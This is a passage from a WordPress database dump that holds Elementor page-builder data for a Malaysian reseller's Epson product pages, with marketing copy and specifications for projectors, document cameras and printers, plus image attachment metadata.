]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p><strong>Epson EB-1785W\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(7923,3475,'_elementor_version','2.5.14'),(8667,3665,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:4267;s:6:\"height\";i:2837;s:4:\"file\";s:22:\"2019/10/Dell-PNG-1.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Dell-PNG-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Dell-PNG-1-300x199.png\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Dell-PNG-1-768x511.png\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Dell-PNG-1-1024x681.png\";s:5:\"width\";i:1024;s:6:\"height\";i:681;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:22:\"Dell-PNG-1-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:22:\"Dell-PNG-1-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:22:\"Dell-PNG-1-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:20:\"Dell-PNG-1-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(7926,3476,'_wp_page_template','template-fullwidth.php'),(7927,3476,'_elementor_edit_mode','builder'),(7928,3476,'_elementor_template_type','post'),(7929,3476,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2424 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><br>\\n\\nThe Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Speed: Up to 30ppm<\\/li>\\n \\t<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li>\\n \\t<li>Quality prints with new Epson Technologies<\\/li>\\n \\t<li>New print job management features<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2426 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><br>\\n\\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 35ppm<\\/li>\\n \\t<li>Auto-Duplex<\\/li>\\n \\t<li>Ethernet &amp; Epson iPrint<\\/li>\\n \\t<li>2 optional paper cassette tray<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2427 aligncenter\\\" 